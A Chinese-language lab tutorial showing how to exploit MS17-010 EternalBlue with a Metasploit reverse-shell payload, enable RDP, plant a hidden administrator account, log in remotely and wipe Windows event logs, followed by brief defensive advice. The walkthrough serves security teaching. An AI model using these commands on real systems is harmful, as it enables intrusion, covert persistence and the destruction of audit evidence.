实战演练：从漏洞利用到图形化控制，一条龙打通内网靶机远程桌面

1. 靶场环境搭建与基础配置在开始实战之前我们需要先搭建一个标准的渗透测试环境。这个环境由两台虚拟机组成攻击机使用Kali Linux 2023.1版本IP地址设置为192.168.25.130靶机使用Windows 7 SP1企业版IP地址配置为192.168.25.132。建议使用VMware Workstation Pro 17进行虚拟化部署网络模式选择仅主机模式以确保实验环境隔离。靶机需要关闭Windows防火墙和所有安全更新模拟一个存在漏洞的真实环境。我建议在部署完成后先做个快照这样在实验过程中出现问题时可以快速回滚。Kali Linux这边需要确保metasploit-framework是最新版本可以通过sudo apt update sudo apt upgrade -y命令完成更新。在实际操作中我发现很多新手容易忽略这一步导致后续漏洞利用失败。2. 利用永恒之蓝漏洞获取初始Shell永恒之蓝(MS17-010)是Windows SMB协议的经典漏洞虽然已经过去多年但在内网渗透中仍然具有重要价值。在Kali终端中输入msfconsole启动Metasploit框架然后依次执行以下命令use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.25.132 set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.25.130 exploit成功执行后我们会获得一个meterpreter会话。这里有个实用技巧使用sessions -i 1命令可以重新连接会话如果连接不稳定的话。我遇到过多次会话突然断开的情况这时候就需要用这个命令重新连接。拿到shell后建议先执行sysinfo查看系统信息用getuid确认当前权限级别。3. 激活远程桌面服务默认情况下Windows的远程桌面服务可能处于禁用状态。我们需要先在meterpreter会话中执行shell进入命令行界面然后检查3389端口状态netstat -ano | findstr 3389如果没有任何输出说明端口未开启。这里我推荐使用注册表方式开启服务因为这种方法在大多数Windows版本中都适用REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f执行成功后建议再次确认端口状态。有时候防火墙会阻止连接所以还需要添加防火墙规则netsh advfirewall firewall add rule nameRemote Desktop protocolTCP dirin localport3389 actionallow在实际渗透中我发现很多管理员会修改默认的3389端口所以还需要检查注册表确认实际端口号REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v PortNumber4. 创建隐蔽的管理员账户直接创建明显的新账户容易被发现我推荐使用更隐蔽的方法。首先创建一个看似正常的用户net user backupadmin Pssw0rd123 /add net localgroup administrators backupadmin /add然后修改注册表使其在登录界面隐藏REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v backupadmin /t REG_DWORD /d 0 /f这样创建的账户不会显示在普通用户列表中但依然具有管理员权限。在实际项目中我还发现可以通过克隆现有用户SID的方式创建更隐蔽的账户不过操作相对复杂适合进阶使用。5. 建立图形化远程连接Kali Linux自带了多个RDP客户端工具我最常用的是xfreerdp。它的优势是支持多种认证方式和更丰富的参数配置xfreerdp /u:backupadmin /p:Pssw0rd123 /v:192.168.25.132 /size:90% clipboard /dynamic-resolution /cert:ignore参数说明/size控制窗口大小clipboard启用剪贴板共享/dynamic-resolution支持动态调整分辨率/cert:ignore忽略证书警告如果连接出现问题可以尝试添加/network:auto参数自动选择网络类型。我实测发现在内网环境中添加/rfx参数可以显著提升图形性能。6. 渗透后的痕迹清理完成渗透后清理痕迹非常重要。需要删除事件日志wevtutil cl system wevtutil cl application wevtutil cl security还要删除创建的注册表键值REG DELETE HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v backupadmin /f最后记得删除防火墙规则netsh advfirewall firewall delete rule nameRemote Desktop7. 防御措施与防护建议作为负责任的网络安全从业者我们必须了解如何防御这类攻击。对于系统管理员我建议及时安装所有安全补丁特别是MS17-010这样的高危漏洞禁用不必要的SMBv1协议配置网络级认证(NLA)增强远程桌面安全性定期审计系统账户和异常登录事件启用Windows Defender攻击面减少规则在最近的攻防演练中我发现越来越多的企业开始部署终端检测与响应(EDR)系统这对防御此类攻击非常有效。